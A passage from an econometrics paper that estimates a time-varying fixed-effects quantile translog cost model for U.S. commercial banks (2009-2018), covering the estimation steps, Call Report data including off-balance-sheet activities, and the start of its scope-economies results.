index \(L(t)\) enters the location function non-neutrally, shifting not only the intercept \(\beta_{0}+\beta_{0}^{*}L(t)\) but also the linear \(\mathbf{\beta}_{1}+\mathbf{\beta}_{1}^{*}L(t)\) and quadratic slopes \(\mathbf{\beta}_{2}+\mathbf{\beta}_{2}^{*}L(t)\), thereby allowing for flexible locational shifts in the costs over time. Analogous scale changes over time are allowed by means of \(S(t)\). In all, by means of the time indices in both the location and scale functions, we are able to accommodate temporal changes in the _entire_ conditional cost distribution. Essentially, our model in (3.1)-(3.2) is a generalization of the popular translog cost-function specification, where all parameters now vary with time, the covariates affect not only the location (centrality) but also the scale (variability) of the conditional cost distribution; and the bank fixed effects are both location- and scale-shifting. The two equations together facilitate a quantile analysis of the bank's cost structure. Along the lines of Machado and Santos Silva (2019) upon whom we build our estimation procedure, we assume that (_i_) \(\varepsilon_{it}\) is \(i.i.d.\) across \(i\) and \(t\) with some cdf \(F_{\varepsilon}\); (_ii_) \(\varepsilon_{it}\perp\mathbf{v}_{it}\) with the normalizations that \(\mathbb{E}\left[\varepsilon_{it}\right]=0\) and \(\mathbb{E}\left[\left|\varepsilon_{it}\right|\right]=1\); and (_iii_) \(\Pr\left[\left[\gamma_{0}+\gamma_{0}^{*}S(t)\right]+\left[\mathbf{\gamma}_{1}+\bm {\gamma}_{1}^{*}S(t)\right]^{\prime}\mathbf{v}_{it}+\frac{1}{2}\left[\mathbf{\gamma}_ {2}+\mathbf{\gamma}_{2}^{*}S(t)\right]^{\prime}\times\text{vec}\left(\mathbf{v}_{it} \mathbf{v}_{it}^{\prime}\right)+\sigma_{i}>0\right]=1\). Then, for any given quantile index \(\tau\in(0,1)\), the \(\tau\)th conditional quantile function of the log-cost \(c_{it}\) implied by (3.1)-(3.2) is \[\mathcal{Q}_{c}\left[\tau|\mathbf{v}_{it}\right] =\overbrace{\left[\beta_{0}+\gamma_{0}q_{\tau}+\beta_{0}^{*}L(t)+ \gamma_{0}^{*}S(t)q_{\tau}\right]+\overbrace{\left[\mathbf{\beta}_{1}+\mathbf{\gamma}_ {1}q_{\tau}+\mathbf{\beta}_{1}^{*}L(t)+\mathbf{\gamma}_{1}^{*}S(t)q_{\tau}\right]}^{t \text{-varying linear quantile slopes}}}^{t\text{-varying quantile slopes}}\mathbf{v}_{it}+\] \[\frac{1}{2}\underbrace{\left[\mathbf{\beta}_{2}+\mathbf{\gamma}_{2}q_{ \tau}+\mathbf{\beta}_{2}^{*}L(t)+\mathbf{\gamma}_{2}^{*}S(t)q_{\tau}\right]^{\prime} \text{vec}\left(\mathbf{v}_{it}\mathbf{v}_{it}^{\prime}\right)+\underbrace{\left[ \lambda_{i}+\sigma_{i}q_{\tau}\right]}_{\text{individual quantile fixed effect}}}_{t\text{-varying quadratic quantile slopes}}, \tag{3.3}\] where \(q_{\tau}=F_{\varepsilon}^{-1}(\tau)\) is the (unknown) \(\tau\)th quantile of \(\varepsilon_{it}\). The translog cost model in (3.3) is quantile-specific because all bracketed "composite" coefficients vary not only with time but also with the cost quantile \(\tau\). Furthermore, the technological change in the cost frontier is also quantile-specific thereby allowing for heterogeneous temporal shifts across the entire cost distribution as opposed to a shift in the mean only. The unobserved bank fixed effect inside the last brackets is also quantile-specific. Thus, quantile model (3.3) can be rewritten compactly as \[\mathcal{Q}_{c}\left[\tau|\mathbf{v}_{it}\right]\equiv\alpha_{0}(\tau,t)+\mathbf{ \alpha}_{1}(\tau,t)^{\prime}\mathbf{v}_{it}+\frac{1}{2}\mathbf{\alpha}_{2}(\tau,t)^{ \prime}\text{vec}\left(\mathbf{v}_{it}\mathbf{v}_{it}^{\prime}\right)+\mu_{i,\tau}, \tag{3.4}\] with the "alpha" coefficients corresponding to the bracketed expressions in (3.3) and \(\mu_{i}\equiv\lambda_{i}+\sigma_{i}q_{\tau}\). We opt to begin with the location-scale model to derive the conditional quantile function of interest in (3.3) as opposed to postulating a quantile regression a la (3.4) _prima facie_ because we seek to estimate these quantiles _indirectly_. This is motivated by the presence of unobserved fixed effects in the quantile model. Namely, since there is no known general transformation that can purge unit fixed effects from the quantile model (owing to nonlinearity of the quantile operator), in such a case the routine check-function-based estimators proceed to _directly_ estimate a vector of individual effects by means of including a full set of unit dummies. However, as noted by Koenker (2004), the introduction of a large number of unit fixed effects significantly inflates the variability of estimates of the main parameters of interest, i.e., the slope coefficients. Furthermore, the optimization of an \(L_{1}\)-norm corresponding to the check-function-based estimators, when there is a large number of binary variables and the associated parameters to be estimated, is well-known to be computationally cumbersome and oftentimes intractable in practice.4 The traditional solution to this assumes that unit fixed effects are only location-shifting and regularizes these individual effects by shrinking them to a common value (see Koenker, 2004; Lamarche, 2010), but these estimators have gained little popularity in applied work largely because of their complexity. While there is an alternative fixed-effect quantile estimator proposed by Canay (2011) that requires no regularization and is notably simpler to implement, it continues to assume that the unit fixed effects have a pure location shift effect. Using the notation of (3.4), this is tantamount to assuming that \(\mu_{i,\tau}=\mu_{i}\) for all \(\tau\). Furthermore, none of these check-function-based estimators guarantee that the estimates of regression quantiles do not cross, which is a pervasive but oft-ignored problem in applied work. We therefore adopt the approach recently proposed by Machado and Santos Silva (2019) that allows an easy-to-implement _indirect_ estimation of the quantile parameters via moments, where all parameters are estimated based on the moments implied by the location-scale model in (3.1)-(3.2). Besides its relative computational simplicity, this approach is advantageous for its ability to control for unobserved unit heterogeneity that is both location- and scale-shifting: the individual effects are allowed to affect the entire distribution rather than just shifting its location (therefore, \(\{\mu_{i,\tau}\}\) are also quantile-specific). Lastly but not least importantly, this moment-based approach can be easily applied to nonlinear-in-parameters models (like ours is) and produces non-crossing quantile regressions. Footnote 4: For instance, in our empirical application \(n>7,500\). To operationalize the estimator, we model unobservable \(L(t)\) and \(S(t)\) via discretization. For each \(\kappa=1,\ldots,T\), define the dummy variable \(D_{\kappa,t}\) that is equal to \(1\) in the \(\kappa\)th time period and \(0\) otherwise. Then, we discretize time indices as \(L(t)=\sum_{\kappa=2}^{T}\eta_{\kappa}D_{\kappa,t}\) and \(S(t)=\sum_{\kappa=2}^{T}\theta_{\kappa}D_{\kappa,t}\), where \(L(1)=\eta_{1}=0\) and \(S(1)=\theta_{1}=0\) are normalized for identification. Parameter identification also requires that both \(\beta_{0}^{*}\) and \(\gamma_{0}^{*}\) be normalized; we set \(\beta_{0}^{*}=\gamma_{0}^{*}=1\). Under these identifying normalizations, \(\beta_{0}\), \(\mathbf{\beta}_{1}\), \(\gamma_{0}\) and \(\mathbf{\gamma}_{1}\) are naturally interpretable as "reference" coefficients in time period \(t=1\). Then, a feasible analogue of the \(\tau\)th conditional cost quantile in (3.3) is given by \[Q_{c}\left[\tau|\mathbf{v}_{it}\right] =\left[\beta_{0}+\gamma_{0}q_{\tau}+\sum_{\kappa}(\eta_{\kappa}+ \theta_{\kappa}q_{\tau})D_{\kappa,t}\right]+\left[\mathbf{\beta}_{1}+\mathbf{\gamma}_{ 1}q_{\tau}+\sum_{\kappa}(\mathbf{\beta}_{1}^{*}\eta_{\kappa}+\mathbf{\gamma}_{1}^{*} \theta_{\kappa}q_{\tau})D_{\kappa,t}\right]^{\prime}\mathbf{v}_{it}+\] \[\frac{1}{2}\left[\mathbf{\beta}_{2}+\mathbf{\gamma}_{2}q_{\tau}+\sum_{ \kappa}(\mathbf{\beta}_{2}^{*}\eta_{\kappa}+\mathbf{\gamma}_{2}^{*}\theta_{\kappa}q_{ \tau})D_{\kappa,t}\right]^{\prime}\mathrm{vec}\left(\mathbf{v}_{it}\mathbf{v}_{it}^{ \prime}\right)+\left[\lambda_{i}+\sigma_{i}q_{\tau}\right]. \tag{3.5}\] Two remarks are in order. First, the discretized parameterization of the unknown \(L(t)\) and \(S(t)\) is akin to a nonparametric local-constant estimation of these unknown functions of time with the bandwidth parameter being set to \(0\). Second, though it might appear at first that, when \(L(t)\) and \(S(t)\) are modeled us ing a series of time dummies, we obtain the time-varying slope coefficients on \(\mathbf{v}_{it}\) by merely interacting the latter with time dummies and adding them as additional regressors, this is _not_ the case here because time dummies are restricted to have the same parameters \(\{\eta_{k}\}\) and \(\{\theta_{k}\}\) both when entering additively as well as when interacting with \(\mathbf{v}_{it}\). Thus, the location and scale functions are not "fully saturated" specification but, in fact, are more parsimonious _nonlinear_ (in parameters) functions with much fewer unknown parameters. In avoiding a fully saturated specification that is equivalent to sample-splitting into cross-sections, we accommodate time-invariant bank fixed effects. ### Estimation Procedure Although the estimation of (3.3) [or (3.5)] can be done in one step via nonlinear method of moments, we adopt a multi-step procedure that is significantly easier to implement. This is possible because the moments implied by model (3.1)-(3.2) and its assumptions are sequential in nature. In other words, we can first estimate parameters of the location function and then those of the scale function in two separate steps. After that, based on the estimates of these parameters, the third step is taken to estimate unknown quantiles and, ultimately, recover time-varying quantile coefficients in (3.3). In what follows, we briefly describe this procedure, with more details available in Appendix A. **Step 1.** We first estimate parameters of the location function. For ease of notation, let \(\mathbf{D}_{t}=[D_{2,t},\ldots,D_{T,t}]^{t}\) and \(\mathbf{\eta}=[\eta_{2},\ldots,\eta_{T}]^{t}\). Under the assumption (_ii_), from (3.1) it follows that the conditional mean function of the log-cost \(c_{it}\) is \[\mathbb{E}\left[c_{it}|\mathbf{v}_{it},\mathbf{D}_{t}\right]=\beta_{0}+\mathbf{\eta}^{ \prime}\mathbf{D}_{t}+\left[\mathbf{\beta}_{1}+\mathbf{\eta}^{\prime}\mathbf{D}_{t}\cdot\mathbf{ \beta}_{1}^{*}\right]^{\prime}\mathbf{v}_{it}+\frac{1}{2}\left[\mathbf{\beta}_{2}+\bm {\eta}^{\prime}\mathbf{D}_{t}\cdot\mathbf{\beta}_{2}^{*}\right]^{\prime}\text{vec} \left(\mathbf{v}_{it}\mathbf{v}_{it}^{\prime}\right)+\lambda_{i}, \tag{3.6}\] which can be consistently estimated in the within-transformed form via nonlinear least squares after purging additive location fixed effects. Having obtained the nonlinear fixed-effects estimates of the slope coefficients \(\left(\mathbf{\tilde{\eta}}^{\prime},\mathbf{\tilde{\beta}}_{1}^{\prime},\mathbf{\tilde{ \beta}}_{2}^{\prime},\mathbf{\tilde{\beta}}_{2}^{*}\right)^{\prime}\), we can then recover the location-shifting intercept \(\beta_{0}\) and fixed effects \(\{\lambda_{i}\}\) under the usual \(\sum_{i=1}^{n}\lambda_{i}=0\) normalization: \[\widehat{\beta}_{0} =\frac{1}{nT}\sum_{i}\sum_{t}\left(c_{it}-\mathbf{\tilde{\eta}}^{ \prime}\mathbf{D}_{t}-\left[\mathbf{\tilde{\beta}}_{1}+\mathbf{\tilde{\eta}}^{\prime}\bm {D}_{t}\cdot\mathbf{\tilde{\beta}}_{1}^{*}\right]^{\prime}\mathbf{v}_{it}-\frac{1}{2} \left[\mathbf{\tilde{\beta}}_{2}+\mathbf{\tilde{\eta}}^{\prime}\mathbf{D}_{t}\cdot\mathbf{ \tilde{\beta}}_{2}^{*}\right]^{\prime}\text{vec}\left(\mathbf{v}_{it}\mathbf{v}_{it}^ {\prime}\right)\right), \tag{3.7}\] \[\widehat{\lambda}_{i} =\frac{1}{T}\sum_{t}\left(c_{it}-\widehat{\beta}_{0}-\mathbf{\tilde{ \eta}}^{\prime}\mathbf{D}_{t}-\left[\mathbf{\tilde{\beta}}_{1}+\mathbf{\tilde{\eta}}^{ \prime}\mathbf{D}_{t}\cdot\mathbf{\tilde{\beta}}_{1}^{*}\right]^{\prime}\mathbf{v}_{it}- \frac{1}{2}\left[\mathbf{\tilde{\beta}}_{2}+\mathbf{\tilde{\eta}}^{\prime}\mathbf{D}_{t} \cdot\mathbf{\tilde{\beta}}_{2}^{*}\right]^{\prime}\text{vec}\left(\mathbf{v}_{it}\bm {v}_{it}^{\prime}\right)\right)\forall i. \tag{3.8}\] Hence, the residual is \(\widehat{u}_{it}=c_{it}-\widehat{\beta}_{0}-\mathbf{\tilde{\eta}}^{\prime}\mathbf{D}_{t }-\left[\mathbf{\tilde{\beta}}_{1}+\mathbf{\tilde{\eta}}^{\prime}\mathbf{D}_{t}\cdot\mathbf{ \tilde{\beta}}_{1}^{*}\right]^{\prime}\mathbf{v}_{it}-\frac{1}{2}\left[\mathbf{\tilde{ \beta}}_{2}+\mathbf{\tilde{\eta}}^{\prime}\mathbf{D}_{t}\cdot\mathbf{\tilde{\beta}}_{2}^ {*}\right]^{\prime}\text{vec}\left(\mathbf{v}_{it}\mathbf{v}_{it}^{\prime}\right)- \widehat{\lambda}_{i}\). **Step 2.** We then estimate parameters of the scale function. Based on the assumptions (_ii_)-(_iii_), we have an auxiliary conditional mean regression: \[\mathbb{E}\left[|u_{it}|\mathbf{v}_{it},\mathbf{D}_{t}\right]=\gamma_{0}+\mathbf{\theta}^{ \prime}\mathbf{D}_{t}+\left[\mathbf{\gamma}_{1}+\mathbf{\theta}^{\prime}\mathbf{D}_{t}\cdot \mathbf{\gamma}_{1}^{*}\right]^{\prime}\mathbf{v}_{it}+\frac{1}{2}\left[\mathbf{\gamma}_{2 }+\mathbf{\theta}^{\prime}\mathbf{D}_{t}\cdot\mathbf{\gamma}_{2}^{*}\right]^{\prime}\text{ vec}\left(\mathbf{v}_{it}\mathbf{v}_{it}^{\prime}\right)+\sigma_{i}, \tag{3.9}\] where \(\mathbf{\theta}=[\theta_{2},\ldots,\theta_{T}]^{\prime}\) and which, just like in the first step, we can estimate via nonlinear least squares after within-transforming scale fixed effects out. This yields the estimates of the scale-function slope coefficients \(\left(\mathbf{\tilde{\theta}}^{\prime},\mathbf{\tilde{\gamma}}_{1}^{\prime},\mathbf{\tilde{ \gamma}}_{1}^{*},\mathbf{\tilde{\gamma}}_{2}^{\prime},\mathbf{\tilde{\gamma}}_{2}^{*} \right)^{\prime}\). To recover the scale-shifting intercept \(\gamma_{0}\) and fixed effects \(\{\sigma_{i}\}\), use \(\sum_{i=1}^{n}\sigma_{i}=0\): \[\widehat{\gamma}_{0} =\frac{1}{nT}\sum_{i}\sum_{t}\left(\left|\widehat{u}_{it}\right|- \widehat{\mathbf{\theta}}^{\prime}\mathbf{D}_{t}-\left[\widehat{\mathbf{\gamma}}_{1}+ \widehat{\mathbf{\theta}}^{\prime}\mathbf{D}_{t}\cdot\widehat{\mathbf{\gamma}}_{1}^{*} \right]^{\prime}\mathbf{v}_{it}-\frac{1}{2}\left[\widehat{\mathbf{\gamma}}_{2}+ \widehat{\mathbf{\theta}}^{\prime}\mathbf{D}_{t}\cdot\widehat{\mathbf{\gamma}}_{2}^{*} \right]^{\prime}\text{vec}\left(\mathbf{v}_{it}\mathbf{v}_{it}^{\prime}\right)\right), \tag{3.10}\] \[\widehat{\sigma}_{i} =\frac{1}{T}\sum_{t}\left(\left|\widehat{u}_{it}\right|-\widehat {\gamma}_{0}-\widehat{\mathbf{\theta}}^{\prime}\mathbf{D}_{t}-\left[\widehat{\mathbf{ \gamma}}_{1}+\widehat{\mathbf{\theta}}^{\prime}\mathbf{D}_{t}\cdot\widehat{\mathbf{\gamma }}_{1}^{*}\right]^{\prime}\mathbf{v}_{it}-\frac{1}{2}\left[\widehat{\mathbf{\gamma}}_ {2}+\widehat{\mathbf{\theta}}^{\prime}\mathbf{D}_{t}\cdot\widehat{\mathbf{\gamma}}_{2}^{*} \right]^{\prime}\text{vec}\left(\mathbf{v}_{it}\mathbf{v}_{it}^{\prime}\right)\right) \forall i. \tag{3.11}\] **Step 3.** For any given quantile index \(0<\tau<1\) of interest, we next estimate the unconditional quantile of \(\varepsilon_{it}\). From (3.2), we have the conditional quantile function of \(u_{it}\): \[\mathcal{Q}_{u}\left[\tau|\mathbf{v}_{it},\mathbf{D}_{t}\right]=\left(\gamma_{0}+\mathbf{ \theta}^{\prime}\mathbf{D}_{t}+\left[\mathbf{\gamma}_{1}+\mathbf{\theta}^{\prime}\mathbf{D}_{ t}\cdot\mathbf{\gamma}_{1}^{*}\right]^{\prime}\mathbf{v}_{it}+\frac{1}{2}\left[\mathbf{ \gamma}_{2}+\mathbf{\theta}^{\prime}\mathbf{D}_{t}\cdot\mathbf{\gamma}_{2}^{*}\right]^{ \prime}\text{vec}\left(\mathbf{v}_{it}\mathbf{v}_{it}^{\prime}\right)+\sigma_{i} \right)\!q_{\tau}, \tag{3.12}\] and therefore we can estimate \(q_{\tau}\) via the standard quantile regression of \(\widehat{u}_{it}\) from Step 1 on \(\left(\widehat{\gamma}_{0}+\widehat{\mathbf{\theta}}^{\prime}\mathbf{D}_{t}+\left[ \widehat{\mathbf{\gamma}}_{1}+\widehat{\mathbf{\theta}}^{\prime}\mathbf{D}_{t}\cdot\widehat {\mathbf{\gamma}}_{1}^{*}\right]^{\prime}\mathbf{v}_{it}+\frac{1}{2}\left[\widehat{\bm {\gamma}}_{2}+\widehat{\mathbf{\theta}}^{\prime}\mathbf{D}_{t}\cdot\widehat{\mathbf{\gamma} }_{2}^{*}\right]^{\prime}\text{vec}\left(\mathbf{v}_{it}\mathbf{v}_{it}^{\prime}\right) +\widehat{\sigma}_{i}\right)\) from Step 2, with no intercept. With all unknown parameters now estimated, we can construct the estimator of the feasible analogue of the \(\tau\)th conditional quantile of the log-cost in (3.5). For statistical inference, we use bootstrap. To correct for finite-sample biases, we employ Efron's (1982) bias-corrected bootstrap percentile confidence intervals. Bootstrap also significantly simplifies testing because, owing to a multi-step nature of our estimator, computation of the asymptotic variance of the parameter estimators is not trivial. Due to the panel structure of data, we use wild residual _block_ bootstrap, thereby taking into account the potential dependence in residuals within each bank over time. Details are provided in Appendix B. ## 4 Data The bank-level data come from the Reports of Condition and Income (the so-called Call Reports) and the Uniform Bank Performance Reports (UBPRs). We obtain annual year-end data for all FDIC-insured commercial banks between 2009 and 2018. As already discussed at length, we focus on the post-financial-crisis period. Consistent with the widely accepted Sealey and Lindley's (1977) "intermediation approach" to formalizing production in banking, we define the bank's cost-function arguments as follows. The two traditional interest-income-centered outputs are \(Y_{1}\) -- total loans, which include real estate loans, agricultural loans, commercial and industrial loans, individual consumer loans and other loans, and \(Y_{2}\) -- total securities, which is the sum of securities held-to-maturity and securities held-for-sale. These output categories are conventional and the same as those considered by, e.g., Koetter et al. (2012) and Wheelock and Wilson (2020). The third output included in our analysis (\(Y_{3}\)) measures nontraditional off-balance sheet operations. We use a sum of credit-equivalent measures of the bank's various off-balance sheet operations as a proxy for its involvement in nontraditional activities. Namely, we convert off-balance sheet items into their _credit equivalents_ which we determine using credit conversion factors that account for the varying credit risk of different nontraditional banking operations.5 This facilitates comparability of (traditional) on- and (nontraditional) off-balance sheet activities in the analysis of banking production, which makes it a popular practice in the literature (e.g., Jagtiani and Khanthavit, 1996; Hughes and Mester, 1998; Stiroh, 2000; Clark and Siems, 2002; Berger and Mester, 2003; Asaftei, 2008; Hughes and Mester, 2013; Wheelock and Wilson, 2020). More concretely, following McCord and Prescott (2014) and the FFIEC 041 Reports, we compute \(Y_{3}\) by summing credit-equivalent amounts of all off-balance sheet items. For instance, in 2015-2018, Call Reports define these items as off-balance sheet securitization exposures, financial standby letters of credit, performance standby letters of credit and transaction-related contingent items, commercial and similar letters of credit with an original maturity of one year or less, retained recourse on small business obligations sold with recourse, repo-style transactions, unused commitments excluding unused commitments to asset backed commercial paper conduits, unconditionally cancelable commitments, over-the-counter derivatives, centrally cleared derivatives, and all other off-balance sheet liabilities. We opt for the credit equivalent of off-balance sheet activities over another popular alternative proxy for banks' nontraditional operations based on net non-interest income (e.g., DeYoung and Rice, 2004; DeYoung and Torna, 2013; Lozano-Vivas and Pasiouras, 2010; Davies and Tracey, 2014; Malikov et al., 2015; Wheelock and Wilson, 2012, 2018) because the latter can be negative, which makes it an undesirable measure for one of the bank's outputs (see Hughes and Mester, 1998). It is, perhaps, even less suitable a measure for an "output" in the structural production analysis because of its fundamental conceptual incongruity with how the bank's other outputs are measured following the convention in the literature: namely, it is based on a "flow" (income) data whereas loans \(Y_{1}\) and securities \(Y_{2}\) are the "stock" (asset) measures. No such issue arises when using credit equivalents of off-balance sheet items. Having said that, we also redo our analysis using this alternative income-based measure of nontraditional activities in one of the robustness checks. In this case, following the literature, the \(Y_{3}\) variable is measured using the total non-interest income (inclusive of the income from fiduciary activities, securities brokerage, investment banking, insurance activities, venture capital and the trading revenue) minus service charges on deposit accounts. The three variable inputs are \(X_{1}\) -- physical capital measured by fixed assets, \(X_{2}\) -- labor, measured as the number of full-time equivalent employees, and \(X_{3}\) -- total borrowed funds, inclusive of deposits and federal funds. Their respective prices are \(W_{1}\), \(W_{2}\) and \(W_{3}\), where \(W_{1}\) is measured as the expenditures on fixed assets divided by premises and fixed assets, \(W_{2}\) is computed by dividing salaries and employee benefits by the number of full-time equivalent employees, and \(W_{3}\) is computed as the interest expenses on deposits and fed funds divided by the sum of total deposits and fed funds purchased. Total variable cost \(C\) is a sum of expenses on \(X_{1}\), \(X_{2}\) and \(X_{3}\). We also consider equity capital \(K_{1}\) as an additional input. However, due to the unavailability of the price of equity, we follow Berger and Mester (2003) and Feng and Serletis (2010) in modeling \(K_{1}\) as a quasi-fixed input. The treatment of equity as an input to banking production technology is consistent with Hughes and Mester (1993, 1998) and Berger and Mester (2003) in that banks may use it as a source of loanable funds and thus as a cushion against losses. By including equity \(K_{1}\) in the cost analysis, we are therefore also able to control for the bank's insolvency risk along the lines of Hughes and Mester's (2003) arguments, whereby "an increase in financial capital reduces the probability of insolvency and provides an incentive for allocating additional resources to manage risk in order to protect the larger equity stake" (p.314). In effect, conditioning the bank's cost on financial capital also allows controlling for quality of loans since the latter is influenced by risk preferences: as Mester (1996) explains, risk-averse bank managers may choose to fund their loans with higher equity-to-deposits ratios (and thus less debt) than a risk-neutral bank would. In our analysis, we also condition the bank's cost on two other proxy measures of output quality reflective of credit risk associated with the likelihood that borrowers default on their loans and accrued interest by failing to make payments as contractually obligated. We include two most commonly used proxies: the ratio of nonperforming assets to total assets \(K_{2}\)(e.g., Hughes and Mester, 2013; Wheelock and Wilson, 2018, 2020) and the ratio of loan loss provision to total assets \(K_{3}\)(e.g., see Laeven and Majnoni, 2003; Acharya et al., 2006; Berger et al., 2010).6 analogous to \(K_{1}\). Obviously, banks' expectations of credit risk are unobservable but as noted by Berger et al. (2010), while the former proxy is an _ex-post_ measure of the actual incurred losses from lending, the loan loss provisions can be interpreted as an _ex-ante_ measure of the level of expected losses and thus as a proxy for expected quality of assets. Controlling for both when modeling bank costs is imperative because lower-quality assets generally require more resources to manage a higher-level risk exposure thereby raising the costs for banks (see Hughes and Mester, 2013). Following the literature, we define nonperforming assets as a sum of total loans and lease financing receivables past due 30 days or more and still accruing, total loans and lease financing receivables not accruing, other real estate owned, and charge-offs on past-due loans and leases. The loss provision is measured using the total provision for loan and lease losses. Footnote 6: Although we denote these variables as “\(K\),” we do _not_ conceptualize them as the quasi-fixed input quantities We exclude observations that have negative/missing values for assets, equity, output quantities and input prices, which are likely the result of erroneous data reporting. This leaves us with an operational sample of 44,704 observations for 7,232 banks. We deflate all nominal variables to the 2005 U.S. dollars \begin{table} \begin{tabular}{l r r r r} \hline \hline Variables & Mean & 1st Qu. & Median & 3rd Qu. \\ \hline \(C\) & 13,602.44 & 2,344.10 & 4,612.10 & 10,066.33 \\ \(Y_{1}\) & 424,480.49 & 55,819.58 & 114,898.89 & 265,677.61 \\ \(Y_{2}\) & 118,621.10 & 13,161.49 & 31,803.01 & 77,360.61 \\ \(Y_{3}\) & 27,304.00 & 659.78 & 2,847.73 & 10,503.06 \\ \(W_{1}\) & 50.79 & 14.83 & 21.27 & 33.85 \\ \(W_{2}\) & 57.86 & 47.00 & 54.34 & 64.90 \\ \(W_{3}\) & 0.82 & 0.40 & 0.66 & 1.09 \\ \(K_{1}\) & 70,383.27 & 9,433.85 & 18,382.47 & 40,467.85 \\ \(K_{2}\) & 0.03 & 0.01 & 0.02 & 0.04 \\ \(K_{3}\) & 1.04 & 0.01 & 0.08 & 0.31 \\ \hline \hline \end{tabular} \(C\) – total variable costs; \(Y_{1}\) – total loans; \(Y_{2}\) – total securities; \(Y_{3}\) – off-balance sheet output measured using credit equivalents; \(W_{1}\) – price of physical capital; \(W_{2}\) – price of labor; \(W_{3}\) – price of financial capital; \(K_{1}\) – total equity; \(K_{2}\) – the ratio of nonperforming assets to total assets; \(K_{3}\) –the ratio of loan loss provisions to total assets. Variables \(C\), \(W_{1}\), \(W_{2}\), \(Y_{1}\), \(Y_{2}\), \(Y_{3}\), and \(K_{1}\) are in thousands of real 2005 USD. Variables \(W_{3}\), \(K_{2}\) and \(K_{3}\) are in \(\%\). \end{table} Table 1: Data Summary Statistics using the consumer price index. Table 1 provides summary statistics for our main variables. Given our emphasis on accounting for banks' off-balance sheet operations, of particular interest is the nontraditional output. Although descriptive statistics in Table 1 expectedly indicate that the volume of \(Y_{3}\) is significantly smaller than that of the two other traditional outputs, banks' involvement in these off-balance sheet activities has, in fact, been steadily expanding in recent years. To show this, we plot the average share of off-balance sheet activities in bank's total output \(Y_{3}/(Y_{1}+Y_{2}+Y_{3})\) in Figure 1(a), from where it is evident that the average share of nontraditional outputs among U.S. commercial banks has been steadily increasing since 2011, almost doubling from about 2% in 2009 to 3.7% in 2018. This is consistent with the narrative that commercial banks in the U.S. are increasingly shifting towards off-balance sheet banking. Obviously, the level of involvement in such nontraditional activities varies considerably across banks, and the rather modest _average_ share of the off-balance sheet activities plotted in Figure 1(a) does not provide a complete picture of the growing prevalence of nontraditional activities in banks' operations because it conceals the well-documented heterogeneity across individual banks. For instance, some banks in our sample are highly specialized in off-balance sheet activities, which account for about 70% of their outputs. Therefore, we also examine an evolution of the off-balance sheet share in banks' output portfolio at different quantiles in the data, with the particular focus on the upper tail of the distribution. Figure 1(b) plots select upper quantiles of \(Y_{3}/(Y_{1}+Y_{2}+Y_{3})\) over the years, with the lines from bottom to top corresponding to the median, 0.75th, 0.90th, 0.99th and 0.995th quantiles. Two observations are in order here. First, owing to the positive skew in the off-balance sheet share distribution, the differences in banks' involvement in nontraditional banking are stark, with the output share ranging from about 1.8% at the median to 19.5% for banks at the top 0.995th quantile. This cross-bank heterogeneity Figure 1: Output Share of Off-Balance sheet Activities over Time, in %: (a) average, (b) select quantiles is expected as the choice to engage in nontraditional operations is associated with various idiosyncratic characteristics of banks, including their asset size (Rogers and Sinkey Jr, 1999). Second, the rising share of off-balance sheet activities is present across just about its entire distribution. The latter is particularly evident in Figure 2 that plots this distribution at the beginning (2009) and the end (2018) of our sample period. Altogether, these data document the rising and heterogeneous level of involvement in nontraditional off-balance sheet activities by U.S. banks in the post-crisis period, not only corroborating the common argument that off-balance sheet activities ought to be accounted in the analysis of banks but also illustrating the importance of adequately accommodating vast heterogeneity across banks in that analysis. We seek to address both these imperatives in our paper. ## 5 Empirical Results This section reports the results based on our time-varying-coefficient fixed-effects quantile model of bank cost that explicitly accommodates three-way heterogeneity across banks: (_i_) distributional heterogeneity, (_ii_) cross-time heterogeneity and (_iii_) unobserved bank heterogeneity. Although our analysis is at different quantiles of the bank's _cost,_ the interpretation of distribution heterogeneity can be generalized and extended to bank _size_ because the bank's operation cost is a good proxy for its size/scale. To sufficiently capture distributional heterogeneity across banks, we estimate our model for the 0.10th, 0.25th, 0.50th, 0.75th and 0.90th quantiles. The middle three quantiles shed light on the cost structure of mid-size banks in the interquartile range of the conditional log-cost distribution, whereas the more extreme 0.10th and 0.90th quantiles provide evidence for the smaller and larger banks, respectively. For inference, we use the 95% bias-corrected bootstrap percentile confidence intervals: one- or two-sided, as appropriate. In what follows, we discuss our main empirical results pertaining to scope Figure 2: Distribution of the Output Share of Off-Balance Sheet Activities in 2009 vs. 2018 economies. We then supplement that discussion by also considering two other sources of potential cost savings in banking, namely, scale economies and technological progress. ### Scope Economies As discussed in Section 2, we investigate the presence of scope economies by using the expansion-path measure of cost subadditivity. Since we analyze bank cost structure across the entire cost distribution as opposed to its first moment (i.e., conditional mean), our cost subadditivity measure is not only observation- but also cost-quantile-specific. When evaluating the formulae in (2.4)-(2.5), we replace \(\mathcal{C}_{t}(\cdot)\) with the exponentiated quantile function of the log-cost \(\mathcal{Q}_{c}(\tau|\cdot)\) since our cost function estimation is for a conditional log-quantile. That is, for a given quantile \(\tau\), we compute the cost subadditivity measure as \[\mathcal{S}_{t}(\tau)=\frac{\sum_{\kappa}\exp\left[\mathcal{Q}_{c}\left(\tau |\partial_{1}^{\kappa}Y_{1}^{*}+\min\{Y_{1}\},\partial_{2}^{\kappa}Y_{2}^{*}+ \min\{Y_{2}\},\partial_{3}^{\kappa}Y_{3}^{*}+\min\{Y_{3}\},t\right)\right]- \exp\left[\mathcal{Q}_{c}\left(\tau|Y_{1},Y_{2},Y_{3},t\right)\right]}{\exp \left[\mathcal{Q}_{c}\left(\tau|Y_{1},Y_{2},Y_{3},t\right)\right]}. \tag{5.1}\] It is noteworthy that our use of quantiles offers another advantage over the more traditional conditional-mean models whereby, owing to a "monotone equivariance property" of quantiles, our estimates of \(\mathcal{S}_{t}(\tau)\), which are based on the _level_ of cost, are immune to transformation biases due to exponentiation of the estimated _log_-cost function. The same however cannot be said about the estimates of scope economies in analogous conditional-mean analyses. Specifically, to evaluate scope economies, most studies typically exponentiate the predicted _logarithm_ of bank cost from the estimated translog conditional-mean regressions while ignoring Jensen's inequality. Consequently, their scope economies estimates are likely biased. To see this, let the conventional fixed-coefficient translog cost regression be \(c=f(\mathbf{v})+\epsilon\) with \(\mathbb{E}[\epsilon|\mathbf{v}]=0\), and recall that upper/lower-case variables are in levels/logs. It then trivially follows that \(\mathbb{E}[C|\mathbf{v}]=\exp\{f(\mathbf{v})\}\mathbb{E}[\exp\{\epsilon\}|\mathbf{v}]\) which generally diverges from \(\exp\{f(\mathbf{v})\}\) by a multiplicative function of \(\mathbf{v}\). Since cost counterfactuals in \(\mathcal{S}_{t}(\tau)\) admit different "\(\mathbf{v}\)" values as arguments, the cost subadditivity measure above will normally be 